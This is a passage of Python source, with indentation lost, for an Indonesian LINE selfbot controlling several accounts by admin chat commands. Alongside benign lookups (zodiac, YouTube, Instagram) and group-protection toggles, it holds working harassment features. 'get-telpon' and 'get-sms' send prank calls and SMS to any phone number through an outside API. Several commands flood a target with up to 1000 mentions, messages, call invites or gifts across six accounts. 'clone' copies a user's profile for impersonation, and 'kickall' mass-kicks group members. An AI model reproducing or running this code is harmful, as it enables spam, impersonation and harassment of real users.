r = requests.post("https://aztro.herokuapp.com/?sign={}&day=today".format(urllib.parse.quote(query)))
data = r.text
data = json.loads(data)
data1 = data["description"]
data2 = data["color"]
translator = Translator()
hasil = translator.translate(data1, dest='id')
hasil1 = translator.translate(data2, dest='id')
A = hasil.text
B = hasil1.text
ret_ = "「 Ramalan zodiak {} hari ini 」\n".format(str(query))
ret_ += str(A)
ret_ += "\n======================\n• Tanggal : " +str(data["current_date"])
ret_ += "\n• Rasi bintang : "+query
ret_ += " ("+str(data["date_range"]+")")
ret_ += "\n• Pasangan Zodiak : " +str(data["compatibility"])
ret_ += "\n• Angka keberuntungan : " +str(data["lucky_number"])
ret_ += "\n• Waktu keberuntungan : " +str(data["lucky_time"])
ret_ += "\n• Warna kesukaan : " +str(B)
cl.sendMessage(msg.to, str(ret_))
elif cmd.startswith("get-bintang "):
if msg._from in admin:
sep = msg.text.split(" ")
url = msg.text.replace(sep[0] + " ","")
with requests.session() as s:
s.headers['user-agent'] = "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36"
r = s.get("https://www.vemale.com/zodiak/{}".format(urllib.parse.quote(url)))
soup = BeautifulSoup(r.content, 'html5lib')
ret_ = ""
for a in soup.select('div.vml-zodiak-detail'):
ret_ += a.h1.string
ret_ += "\n"+ a.h4.string
ret_ += " : "+ a.span.string +""
for b in soup.select('div.col-center'):
ret_ += "\nTanggal : "+ b.string
for d in soup.select('div.number-zodiak'):
ret_ += "\nAngka keberuntungan : "+ d.string
for c in soup.select('div.paragraph-left'):
ta = c.text
tab = ta.replace(" ", "")
tabs = tab.replace(".", ".\n")
ret_ += "\n"+ tabs
#print (ret_)
cl.sendMessage(msg.to, str(ret_))
elif cmd.startswith("get-telpon "):
if msg._from in admin:
sep = msg.text.split(" ")
nomor = text.replace(sep[0] + " ","")
r = requests.get("http://apisora2.herokuapp.com/prank/call/?no={}".format(urllib.parse.quote(nomor)))
data = r.text
data = json.loads(data)
ret_ = "「 Prangked Telpon 」"
ret_ += "\n• Status : {}".format(str(data["status"]))
ret_ += "\n• Tujuan "+str(data["result"])
cl.sendMessage(msg.to, str(ret_))
elif cmd.startswith("get-sms "):
if msg._from in admin:
sep = msg.text.split(" ")
nomor = text.replace(sep[0] + " ","")
r = requests.get("http://apisora2.herokuapp.com/prank/sms/?no={}".format(urllib.parse.quote(nomor)))
data = r.text
data = json.loads(data)
ret_ = "「 Prangked Sms 」"
ret_ += "\n• Status : {}".format(str(data["status"]))
ret_ += "\n• Tujuan "+str(data["result"])
cl.sendMessage(msg.to, str(ret_))
elif cmd.startswith("get-mimpi "):
if msg._from in admin:
sep = msg.text.split(" ")
mimpi = msg.text.replace(sep[0] + " ","")
with requests.session() as s:
s.headers['user-agent'] = 'Mozilla/5.0'
r = s.get("http://primbon.com/tafsir_mimpi.php?mimpi={}&submit=+Submit+".format(urllib.parse.quote(mimpi)))
soup = BeautifulSoup(r.content, 'html5lib')
for anu in soup.find_all('i'):
ret_ = anu.get_text()
cl.sendMessage(msg.to,ret_)
elif text.lower() == 'top kaskus':
if msg._from in admin:
r = requests.get("https://api.bayyu.net/kaskus-hotthread/?apikey=c28c944199384f191335f1f8924414fa839350d&page=2")
data=r.text
data=json.loads(data)
if data["hot_threads"] != []:
no = 0
hasil = "「 Kaskus Search 」\n"
for news in data["hot_threads"]:
no += 1
hasil += "\n" + str(no) + ". Judul : " + str(news["title"]) + "\n • Deskripsi : " + str(news["detail"]) + "\n• Link: " + str(news["link"]) + "\n"
hasil += "\n"
cl.sendText(msg.to, str(hasil))
elif cmd.startswith("get-video "):
if msg._from in admin:
sep = msg.text.split(" ")
search = msg.text.replace(sep[0] + " ","")
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
url = web.get("http://rahandiapi.herokuapp.com/youtubeapi/search?key=betakey&q={}".format(urllib.parse.quote(search)))
data = url.text
data = json.loads(data)
if data["result"] != []:
video = random.choice(data["result"]["videolist"])
vid = video["url"]
start = timeit.timeit()
ret = "「 Informasi Video 」\n"
ret += "• Judul : {}".format(str(data["result"]["title"]))
ret += "\n• Author : {}".format(str(data["result"]["author"]))
ret += "\n• Durasi : {}".format(str(data["result"]["duration"]))
ret += "\n• Like nya : {}".format(str(data["result"]["likes"]))
ret += "\n• Rating : {}".format(str(data["result"]["rating"]))
ret += "\n• TimeTaken : {}".format(str(start))
ret += "\n• Deskripsi : {}\n「 Waiting Encoding 」".format(str(data["result"]["description"]))
cl.sendText(msg.to, str(ret))
cl.sendVideoWithURL(msg.to, str(vid))
elif cmd.startswith("get-mp3 "):
if msg._from in admin:
sep = msg.text.split(" ")
search = msg.text.replace(sep[0] + " ","")
with requests.session() as web:
web.headers["User-Agent"] = random.choice(settings["userAgent"])
url = web.get("http://rahandiapi.herokuapp.com/youtubeapi/search?key=betakey&q={}".format(urllib.parse.quote(search)))
data = url.text
data = json.loads(data)
if data["result"] != []:
audio = random.choice(data["result"]["audiolist"])
aud = audio["url"]
start = timeit.timeit()
ret = "「 Informasi Mp3 」\n"
ret += "• Judul : {}".format(str(data["result"]["title"]))
ret += "\n• Author : {}".format(str(data["result"]["author"]))
ret += "\n• Durasi : {}".format(str(data["result"]["duration"]))
ret += "\n• Like nya : {}".format(str(data["result"]["likes"]))
ret += "\n• Rating : {}".format(str(data["result"]["rating"]))
ret += "\n• TimeTaken : {}".format(str(start))
ret += "\n• Deskripsi : {}\n「 Waiting Encoding 」".format(str(data["result"]["description"]))
cl.sendText(msg.to, str(ret))
cl.sendAudioWithURL(msg.to, str(aud))
elif cmd.startswith("get-instagram "):
if msg._from in admin:
try:
sep = msg.text.split(" ")
instagram = msg.text.replace(sep[0] + " ","")
response = requests.get("https://www.instagram.com/"+instagram+"?__a=1")
data = response.json()
namaIG = str(data['graphql']['user']['full_name'])
bioIG = str(data['graphql']['user']['biography'])
mediaIG = str(data['graphql']['user']['edge_owner_to_timeline_media']['count'])
verifIG = str(data['graphql']['user']['is_verified'])
usernameIG = str(data['graphql']['user']['username'])
followerIG = str(data['graphql']['user']['edge_followed_by']['count'])
profileIG = data['graphql']['user']['profile_pic_url_hd']
privateIG = str(data['graphql']['user']['is_private'])
followIG = str(data['graphql']['user']['edge_follow']['count'])
link = "• Link : " + "https://www.instagram.com/" + instagram
text = "「 Instagram User 」\n• Name : "+namaIG+"\n• Username : "+usernameIG+"\n• Follower : "+followerIG+"\n• Following : "+followIG+"\n• Total post : "+mediaIG+"\n• Verified : "+verifIG+"\n• Private : "+privateIG+"\n• Biography : "+bioIG+"" "\n" + link
cl.sendImageWithURL(msg.to, profileIG)
cl.sendMessage(msg.to, str(text))
except Exception as e:
cl.sendMessage(msg.to, str(e))
elif cmd.startswith("get-date "):
if msg._from in admin:
sep = msg.text.split(" ")
tanggal = msg.text.replace(sep[0] + " ","")
r=requests.get('https://script.google.com/macros/exec?service=AKfycbw7gKzP-WYV2F5mc9RaR7yE3Ve1yN91Tjs91hp_jHSE02dSv9w&nama=ervan&tanggal='+tanggal)
data=r.text
data=json.loads(data)
lahir = data["data"]["lahir"]
usia = data["data"]["usia"]
ultah = data["data"]["ultah"]
zodiak = data["data"]["zodiak"]
cl.sendMessage(msg.to,"「 Date Info 」\n"+"「✭」 Date Of Birth : "+lahir+"\n「✭」 Age : "+usia+"\n「✭」 Ultah : "+ultah+"\n「✭」 Zodiak : "+zodiak)
elif cmd.startswith("clone "):
if msg._from in admin:
if 'MENTION' in msg.contentMetadata.keys():
names = re.findall(r'@(\w+)', text)
mention = ast.literal_eval(msg.contentMetadata['MENTION'])
mentionees = mention['MENTIONEES']
for mention in mentionees:
contact = mention["M"]
break
try:
cl.cloneContactProfile(contact)
ryan = cl.getContact(contact)
zx = ""
zxc = ""
zx2 = []
xpesan = "「 Clone Profile 」\nTarget nya "
ret_ = "Berhasil clone profile target"
ry = str(ryan.displayName)
pesan = ''
pesan2 = pesan+"@x \n"
xlen = str(len(zxc)+len(xpesan))
xlen2 = str(len(zxc)+len(pesan2)+len(xpesan)-1)
zx = {'S':xlen, 'E':xlen2, 'M':ryan.mid}
zx2.append(zx)
zxc += pesan2
text = xpesan + zxc + ret_ + ""
cl.sendMessage(to, text, contentMetadata={'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}, contentType=0)
except:
cl.sendMessage(msg.to, "Gagal clone profile")
elif text.lower() == 'restore':
if msg._from in admin:
try:
lineProfile.displayName = str(myProfile["displayName"])
lineProfile.statusMessage = str(myProfile["statusMessage"])
lineProfile.pictureStatus = str(myProfile["pictureStatus"])
cl.updateProfileAttribute(8, lineProfile.pictureStatus)
cl.updateProfile(lineProfile)
sendMention(msg.to, sender, "「 Restore Profile 」\nNama ", " \nBerhasil restore profile")
except:
cl.sendMessage(msg.to, "Gagal restore profile")
elif cmd.startswith("spamtag: "):
if wait["selfbot"] == True:
if msg._from in admin:
proses = text.split(":")
strnum = text.replace(proses[0] + ":","")
num = int(strnum)
Setmain["limit"] = num
cl.sendText(msg.to,"「 Status Spamtag 」\nBerhasil diubah jadi {} kali".format(str(strnum)))
elif cmd.startswith("spamcall: "):
if wait["selfbot"] == True:
if msg._from in admin:
proses = text.split(":")
strnum = text.replace(proses[0] + ":","")
num = int(strnum)
wait["limit"] = num
cl.sendText(msg.to,"「 Status Spamcall 」\nBerhasil diubah jadi {} kali".format(str(strnum)))
elif cmd.startswith("spamtag "):
if wait["selfbot"] == True:
if msg._from in admin:
if 'MENTION' in msg.contentMetadata.keys():
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
zx = ""
zxc = " "
zx2 = []
pesan2 = "@a"" "
xlen = str(len(zxc))
xlen2 = str(len(zxc)+len(pesan2)-1)
zx = {'S':xlen, 'E':xlen2, 'M':key1}
zx2.append(zx)
zxc += pesan2
msg.contentType = 0
msg.text = zxc
lol = {'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}
msg.contentMetadata = lol
jmlh = int(Setmain["limit"])
if jmlh <= 1000:
for x in range(jmlh):
try:
cl.sendMessage1(msg)
except Exception as e:
cl.sendText(msg.to,str(e))
else:
cl.sendText(msg.to,"Jumlah melebihi 1000")
elif cmd.startswith("panggil "):
if wait["selfbot"] == True:
if msg._from in admin:
if 'MENTION' in msg.contentMetadata.keys():
key = eval(msg.contentMetadata["MENTION"])
key1 = key["MENTIONEES"][0]["M"]
zx = ""
zxc = " "
zx2 = []
pesan2 = "@a"" "
xlen = str(len(zxc))
xlen2 = str(len(zxc)+len(pesan2)-1)
zx = {'S':xlen, 'E':xlen2, 'M':key1}
zx2.append(zx)
zxc += pesan2
msg.contentType = 0
msg.text = zxc
lol = {'MENTION':str('{"MENTIONEES":'+json.dumps(zx2).replace(' ','')+'}')}
msg.contentMetadata = lol
jmlh = int(Setmain["limit"])  # assumed: repeat count comes from the configured spamtag limit, not the target mid
if jmlh <= 1000:
for x in range(jmlh):
try:
cl.sendMessage1(msg)
except Exception as e:
cl.sendText(msg.to,str(e))
elif cmd == "spamcall":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
group = cl.getGroup(to)
members = [mem.mid for mem in group.members]
cl.sendMessage(msg.to, "Berhasil mengundang {} undangan Call Grup".format(str(wait["limit"])))
call.acquireGroupCallRoute(to)
call.inviteIntoGroupCall(to, contactIds=members)
elif cmd.startswith("spamcall "):
if wait["selfbot"] == True:
if msg._from in admin:
proses = text.split(" ")
strnum = text.replace(proses[0] + " ","")
group = cl.getGroup(to)
members = [mem.mid for mem in group.members]
jumlah = int(strnum)
cl.sendText(msg.to,"Undangan call grup {} sukses".format(str(strnum)))
if jumlah <= 1000:
for x in range(jumlah):
try:
call.acquireGroupCallRoute(to)
call.inviteIntoGroupCall(to, contactIds=members)
except Exception as e:
cl.sendText(msg.to,str(e))
elif 'Gift: ' in msg.text:
if wait["selfbot"] == True:
if msg._from in admin:
korban = msg.text.replace('Gift: ','')
korban2 = korban.split()
midd = korban2[0]
jumlah = int(korban2[1])
cl.sendText(msg.to,"「 Spam Gift 」\nBerhasil spamgift {} kali".format(str(jumlah)))
if jumlah <= 1000:
for var in range(0,jumlah):
cl.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
ki.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
kk.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
kc.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
km.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
kb.sendMessage(midd, None, contentMetadata={'PRDID': 'a0768339-c2d3-4189-9653-2909e9bb6f58', 'PRDTYPE': 'THEME', 'MSGTPL': '6'}, contentType=9)
elif 'Spam: ' in msg.text:
if wait["selfbot"] == True:
if msg._from in admin:
korban = msg.text.replace('Spam: ','')
korban2 = korban.split()
midd = korban2[0]
jumlah = int(korban2[1])
if jumlah <= 1000:
for var in range(0,jumlah):
cl.sendMessage(midd, str(Setmain["message1"]))
ki.sendMessage(midd, str(Setmain["message1"]))
kk.sendMessage(midd, str(Setmain["message1"]))
kc.sendMessage(midd, str(Setmain["message1"]))
km.sendMessage(midd, str(Setmain["message1"]))
kb.sendMessage(midd, str(Setmain["message1"]))
#=========== [ Add Image ] ============#
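# addimg/dellimg/listimage manage the image.json keyword list; after "addimg <nama>" the next image sent is stored under that name.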
elif cmd.startswith("addimg "):
if msg._from in admin:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
name = name.lower()
if name not in images:
wait["Addimage"]["status"] = True
wait["Addimage"]["name"] = str(name.lower())
images[str(name.lower())] = ""
f = codecs.open("image.json","w","utf-8")
json.dump(images, f, sort_keys=True, indent=4, ensure_ascii=False)
cl.sendText(msg.to, "Silahkan kirim fotonya...")
else:
cl.sendText(msg.to, "Foto itu sudah dalam list")
elif cmd.startswith("dellimg "):
if msg._from in admin:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
name = name.lower()
if name in images:
cl.deleteFile(images[str(name.lower())])
del images[str(name.lower())]
f = codecs.open("image.json","w","utf-8")
json.dump(images, f, sort_keys=True, indent=4, ensure_ascii=False)
cl.sendText(msg.to, "Berhasil menghapus {}".format( str(name.lower())))
else:
cl.sendText(msg.to, "Foto itu tidak ada dalam list")
elif text.lower() == "listimage":
if msg._from in admin:
no = 0
ret_ = "「 Daftar Image 」\n\n"
for image in images:
no += 1
ret_ += str(no) + ". " + image.title() + "\n"
ret_ += "\nTotal「{}」Images".format(str(len(images)))
cl.sendText(to, ret_)
#=========== [ Add Video ] ============#
elif cmd.startswith("addvideo "):
if msg._from in admin:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
name = name.lower()
if name not in videos:
wait["Addvideo"]["status"] = True
wait["Addvideo"]["name"] = str(name.lower())
videos[str(name.lower())] = ""
f = codecs.open("video.json","w","utf-8")
json.dump(videos, f, sort_keys=True, indent=4, ensure_ascii=False)
cl.sendText(msg.to, "Silahkan kirim videonya...")
else:
cl.sendText(msg.to, "Video itu sudah dalam list")
elif cmd.startswith("dellvideo "):
if msg._from in admin:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
name = name.lower()
if name in videos:
cl.deleteFile(videos[str(name.lower())])
del videos[str(name.lower())]
f = codecs.open("video.json","w","utf-8")
json.dump(videos, f, sort_keys=True, indent=4, ensure_ascii=False)
cl.sendText(msg.to, "Berhasil menghapus video {}".format( str(name.lower())))
else:
cl.sendText(msg.to, "Video itu tidak ada dalam list")
elif text.lower() == "listvideo":
if msg._from in admin:
no = 0
ret_ = "「 Daftar Video 」\n\n"
for video in videos:
no += 1
ret_ += str(no) + ". " + video.title() + "\n"
ret_ += "\nTotal「{}」Videos".format(str(len(videos)))
cl.sendText(to, ret_)
sendMention(msg.to, msg._from,"","\nJika ingin play video nya,\nSilahkan ketik nama - judul\nBisa juga ketik namanya saja")
#=========== [ Add Mp3 ] ============#
elif cmd.startswith("addmp3 "):
if msg._from in admin:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
name = name.lower()
if name not in audios:
wait["Addaudio"]["status"] = True
wait["Addaudio"]["name"] = str(name.lower())
audios[str(name.lower())] = ""
f = codecs.open("audio.json","w","utf-8")
json.dump(audios, f, sort_keys=True, indent=4, ensure_ascii=False)
cl.sendText(msg.to, "Silahkan kirim mp3 nya...")
else:
cl.sendText(msg.to, "Mp3 itu sudah dalam list")
elif cmd.startswith("dellmp3 "):
if msg._from in admin:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
name = name.lower()
if name in audios:
cl.deleteFile(audios[str(name.lower())])
del audios[str(name.lower())]
f = codecs.open("audio.json","w","utf-8")
json.dump(audios, f, sort_keys=True, indent=4, ensure_ascii=False)
cl.sendText(msg.to, "Berhasil menghapus mp3 {}".format( str(name.lower())))
else:
cl.sendText(msg.to, "Mp3 itu tidak ada dalam list")
elif text.lower() == "listmp3":
if msg._from in admin:
no = 0
ret_ = "「 Daftar Lagu 」\n\n"
for audio in audios:
no += 1
ret_ += str(no) + ". " + audio.title() + "\n"
ret_ += "\nTotal「{}」Lagu".format(str(len(audios)))
cl.sendText(to, ret_)
sendMention(msg.to, msg._from,"","\nJika ingin play mp3 nya,\nSilahkan ketik nama - judul\nBisa juga ketik namanya saja")
#=========== [ Add Sticker ] ============#
elif cmd.startswith("addsticker "):
if msg._from in admin:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
name = name.lower()
if name not in stickers:
wait["Addsticker"]["status"] = True
wait["Addsticker"]["name"] = str(name.lower())
stickers[str(name.lower())] = ""
f = codecs.open("sticker.json","w","utf-8")
json.dump(stickers, f, sort_keys=True, indent=4, ensure_ascii=False)
cl.sendText(msg.to, "Silahkan kirim stickernya...")
else:
cl.sendText(msg.to, "Sticker itu sudah dalam list")
elif cmd.startswith("dellsticker "):
if msg._from in admin:
sep = text.split(" ")
name = text.replace(sep[0] + " ","")
name = name.lower()
if name in stickers:
del stickers[str(name.lower())]
f = codecs.open("sticker.json","w","utf-8")
json.dump(stickers, f, sort_keys=True, indent=4, ensure_ascii=False)
cl.sendText(msg.to, "Berhasil menghapus sticker {}".format( str(name.lower())))
else:
cl.sendText(msg.to, "Sticker itu tidak ada dalam list")
elif text.lower() == "liststicker":
if msg._from in admin:
no = 0
ret_ = "「 Daftar Sticker 」\n\n"
for sticker in stickers:
no += 1
ret_ += str(no) + ". " + sticker.title() + "\n"
ret_ += "\nTotal「{}」Stickers".format(str(len(stickers)))
cl.sendText(to, ret_)
#===========Protection============#
elif 'Welcome ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Welcome ','')
if spl == 'on':
if msg.to in welcome:
msgs = "Welcome Msg sudah aktif"
else:
welcome.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ ON ]\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「 Status Welcome 」\n" + msgs)
elif spl == 'off':
if msg.to in welcome:
welcome.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ OFF ]\nDi Group : " +str(ginfo.name)
else:
msgs = "Welcome Msg sudah tidak aktif"
cl.sendMessage(msg.to, "「 Status Welcome 」\n" + msgs)
elif 'Protecturl ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protecturl ','')
if spl == 'on':
if msg.to in protectqr:
msgs = "Protect url sudah aktif"
else:
protectqr.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ ON ]\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「 Status Protect Url 」\n" + msgs)
elif spl == 'off':
if msg.to in protectqr:
protectqr.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ OFF ]\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect url sudah tidak aktif"
cl.sendMessage(msg.to, "「 Status Protect Url 」\n" + msgs)
elif 'Protectkick ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectkick ','')
if spl == 'on':
if msg.to in protectkick:
msgs = "Protect kick sudah aktif"
else:
protectkick.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ ON ]\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「 Status Protect kick 」\n" + msgs)
elif spl == 'off':
if msg.to in protectkick:
protectkick.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ OFF ]\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect kick sudah tidak aktif"
cl.sendMessage(msg.to, "「 Status Protect kick 」\n" + msgs)
elif 'Protectjoin ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectjoin ','')
if spl == 'on':
if msg.to in protectjoin:
msgs = "Protect join sudah aktif"
else:
protectjoin.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ ON ]\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「 Status Protect Join 」\n" + msgs)
elif spl == 'off':
if msg.to in protectjoin:
protectjoin.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ OFF ]\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect join sudah tidak aktif"
cl.sendMessage(msg.to, "「 Status Protect Join 」\n" + msgs)
elif 'Protectcancel ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectcancel ','')
if spl == 'on':
if msg.to in protectcancel:
msgs = "Protect cancel sudah aktif"
else:
protectcancel.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ ON ]\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「 Status Protect Cancel 」\n" + msgs)
elif spl == 'off':
if msg.to in protectcancel:
protectcancel.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ OFF ]\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect cancel sudah tidak aktif"
cl.sendMessage(msg.to, "「 Status Protect Cancel 」\n" + msgs)
elif 'Protectinvite ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Protectinvite ','')
if spl == 'on':
if msg.to in protectinvite:
msgs = "Protect invite sudah aktif"
else:
protectinvite.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ ON ]\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "「 Status Protect Invite 」\n" + msgs)
elif spl == 'off':
if msg.to in protectinvite:
protectinvite.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ OFF ]\nDi Group : " +str(ginfo.name)
else:
msgs = "Protect invite sudah tidak aktif"
cl.sendMessage(msg.to, "「 Status Protect Invite 」\n" + msgs)
elif 'Antijs ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Antijs ','')
if spl == 'on':
if msg.to in protectantijs:
msgs = "Anti JS sudah aktif"
else:
protectantijs.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Anti JS Diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "Diaktifkan\n" + msgs)
elif spl == 'off':
if msg.to in protectantijs:
protectantijs.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Anti JS Dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Anti JS Sudah Tidak Aktif"
cl.sendMessage(msg.to, "Dinonaktifkan\n" + msgs)
elif 'Ghost ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Ghost ','')
if spl == 'on':
if msg.to in ghost:
msgs = "Ghost sudah aktif"
else:
ghost.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Ghost Diaktifkan\nDi Group : " +str(ginfo.name)
cl.sendMessage(msg.to, "Diaktifkan\n" + msgs)
elif spl == 'off':
if msg.to in ghost:
ghost.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Ghost Dinonaktifkan\nDi Group : " +str(ginfo.name)
else:
msgs = "Ghost Sudah Tidak Aktif"
cl.sendMessage(msg.to, "Dinonaktifkan\n" + msgs)
elif 'Allprotect ' in msg.text:
if msg._from in admin:
spl = msg.text.replace('Allprotect ','')
if spl == 'on':
if msg.to in protectqr:
msgs = ""
else:
protectqr.append(msg.to)
if msg.to in protectkick:
msgs = ""
else:
protectkick.append(msg.to)
if msg.to in protectinvite:
msgs = ""
else:
protectinvite.append(msg.to)
if msg.to in protectantijs:
msgs = ""
else:
protectantijs.append(msg.to)
if msg.to in ghost:
msgs = ""
else:
ghost.append(msg.to)
if msg.to in protectcancel:
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ ON ]\nDi Group : " +str(ginfo.name)
msgs += "\nSemua sudah diaktifkan"
else:
protectcancel.append(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ ON ]\nDi Group : " +str(ginfo.name)
msgs += "\nSemua protection diaktifkan"
cl.sendMessage(msg.to, "「 Status Protection 」\n" + msgs)
elif spl == 'off':
if msg.to in protectqr:
protectqr.remove(msg.to)
else:
msgs = ""
if msg.to in protectkick:
protectkick.remove(msg.to)
else:
msgs = ""
if msg.to in protectinvite:
protectinvite.remove(msg.to)
else:
msgs = ""
if msg.to in protectantijs:
protectantijs.remove(msg.to)
else:
msgs = ""
if msg.to in ghost:
ghost.remove(msg.to)
else:
msgs = ""
if msg.to in protectcancel:
protectcancel.remove(msg.to)
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ OFF ]\nDi Group : " +str(ginfo.name)
msgs += "\nSemua protection dimatikan"
else:
ginfo = cl.getGroup(msg.to)
msgs = "Status : [ OFF ]\nDi Group : " +str(ginfo.name)
msgs += "\nSemua protection dimatikan"
cl.sendMessage(msg.to, "「 Status Protection 」\n" + msgs)
#===========KICKOUT============#
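# "Nk @target" briefly opens the group ticket so the helper account (sw) can join, kick the target, and leave;
# "Kick @target" kicks with a random bot account; "kickall" kicks every member when Kickallmember is enabled.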
elif ("Nk " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Bots:
try:
G = cl.getGroup(msg.to)
G.preventedJoinByTicket = False
cl.updateGroup(G)
invsend = 0
Ticket = cl.reissueGroupTicket(msg.to)
sw.acceptGroupInvitationByTicket(msg.to,Ticket)
sw.kickoutFromGroup(msg.to, [target])
sw.leaveGroup(msg.to)
X = cl.getGroup(msg.to)
X.preventedJoinByTicket = True
cl.updateGroup(X)
except:
pass
elif ("Kick " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Bots:
try:
random.choice(ABC).kickoutFromGroup(msg.to, [target])
except:
pass
elif cmd == "kickall":
if wait["selfbot"] == True:
if msg._from in admin:
if msg.toType == 2:
if wait["Kickallmember"]:
_name = msg.text.replace("Kickall","")
gs = cl.getGroup(msg.to)
targets = []
for g in gs.members:
if _name in g.displayName:
targets.append(g.mid)
if targets == []:
cl.sendMessage(msg.to,"Target Not found.")
else:
for target in targets:
if target not in Bots and target not in Saints:
try:
klist=[cl,ki,kk,kc,km,kb]
kicker=random.choice(klist)
kicker.kickoutFromGroup(msg.to,[target])
except Exception as error:
cl.sendMessage(msg.to, str(error))
#===========ADMIN ADD============#
elif ("Adminadd " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
admin.append(target)
cl.sendMessage(msg.to,"Berhasil menambahkan admin")
except:
pass
elif ("Staffadd " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
staff.append(target)
cl.sendMessage(msg.to,"Berhasil menambahkan staff")
except:
pass
elif ("Botadd " in msg.text):
if wait["selfbot"] == True:
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
try:
Bots.append(target)
cl.sendMessage(msg.to,"Berhasil menambahkan bot")
except:
pass
elif ("Admindell " in msg.text):
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Saints:
try:
admin.remove(target)
cl.sendMessage(msg.to,"Berhasil menghapus admin")
except:
pass
elif ("Staffdell " in msg.text):
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target not in Saints:
try:
staff.remove(target)
cl.sendMessage(msg.to,"Berhasil menghapus staff")
except:
pass
elif ("Botdell " in msg.text):
if msg._from in admin:
key = eval(msg.contentMetadata["MENTION"])
key["MENTIONEES"][0]["M"]
targets = []
for x in key["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
